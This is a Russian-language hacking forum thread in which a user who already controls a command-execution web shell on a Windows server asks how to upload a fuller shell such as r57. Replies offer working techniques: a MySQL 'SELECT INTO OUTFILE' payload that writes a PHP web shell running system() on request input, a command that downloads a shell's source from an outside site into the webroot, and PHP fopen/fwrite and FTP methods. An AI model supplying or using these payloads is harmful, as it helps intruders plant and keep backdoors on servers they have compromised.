![]() |
Способы заливки файлов
Есть shell.php?cmd= .
Хотел залить более менее удобный шелл типа r57. Всё что пришло в голову: 1)Заливка через FTP с поднятием на своём компе сервера, но не смог пока разобраться с авторизацией в slimftpd. 2)Расшарить папку 3)И пробовал записать построчно через echo (добавляются слэши перед кавычками в итоге скрипт не пашет) Может кто нибудь предложить другие способы? |
wget, curl, fetch
|
Сорри не уточнил.Дело происходит в винде
|
Если есть возможность выполнить пхп - через fopen(), да и многими другими функциями можно. Я так понял - шелл ты сам залил? Раз залил шелл - залей инклюд или тот же fopen() -> fwrite()
з.ы. вот ещё почитай про работу с фтп через командную строку - ttp://www.winblog.ru/net/1147765001-08020803.html |
инклюд нельзя (
Можно про fopen() и fwrite() поподробнее? Я пхп совсем не знаю (( |
Попробуй через фтп вот так -
Код:
<? |
если есть какая либо база на сайте попробуй приконнектиться к ней с удаленного шела и уже через базу залить шел
CREATE TABLE temptab1( codetab TEXT ) TYPE=MYISaM; INSERT INTO temptab1(codetab) VALUES( '<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>' ); into dumpfile select * into outfile '/Library/WebServer/Documents/123.php' from temptab1; flush logs; думаю разберешься что куда ставить |
Попробуй так:
shell.php?cmd=get http://site/r57.txt > C:\путь_до_www\r57.php (по дефолту в C:\AppServ\www\) "http://site/r57.txt " - сайт на котором лежит исходник шела в txt формате... (если будет в php формате многие выражения понерфяться, что соответственно приведёт к неработоспособности шела, поэтому используй изначально txt) |
apollо
"get" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. Я тоже об этом думал |
heks
К сожалению нет. bind-adress 127.0.0.1 |
| Время: 02:10 |